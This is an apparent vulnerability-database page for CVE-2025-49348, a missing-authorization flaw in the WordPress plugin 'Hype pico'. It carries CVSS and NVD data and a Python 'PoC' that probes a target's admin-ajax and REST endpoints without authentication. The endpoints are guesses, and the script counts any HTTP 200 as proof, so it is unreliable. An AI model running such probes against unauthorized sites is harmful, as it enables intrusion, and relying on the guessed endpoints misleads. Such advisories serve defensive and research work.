Security Vulnerability Report
中文
CVE-2025-49348 CVSS 5.3 MEDIUM

CVE-2025-49348

Published: 2025-12-09 16:17:58
Last Modified: 2026-04-27 20:16:11

Description

Missing Authorization vulnerability in Hype Hype pico allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hype: from n/a through <= 1.0.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Hype Hype pico插件 <= 1.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49348 PoC - Missing Authorization in Hype Hype pico plugin # Target: WordPress site with Hype Hype pico plugin <= 1.0.5 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-49348 Missing Authorization vulnerability """ # Common WordPress plugin paths potential_paths = [ '/wp-content/plugins/pico/', '/wp-content/plugins/hype-pico/', '/wp-admin/admin-ajax.php', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-49348 - Missing Authorization in Hype Hype pico") # Test unauthenticated access to protected endpoints # Replace 'action' and 'nonce' with actual vulnerable parameters test_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php?action=pico_get_data", f"{target_url}/wp-json/wp/v2/pico/settings", ] for endpoint in test_endpoints: try: response = requests.get(endpoint, timeout=10) # Check if we can access without authentication if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}") elif response.status_code == 401: print(f"[-] Protected: {endpoint}") else: print(f"[*] Status {response.status_code}: {endpoint}") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("\n[*] Manual verification recommended") print("[*] Check plugin version and review access controls") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-49348.py http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49348", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:58.387", "lastModified": "2026-04-27T20:16:11.080", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Hype Hype pico allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hype: from n/a through <= 1.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pico/vulnerability/wordpress-hype-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}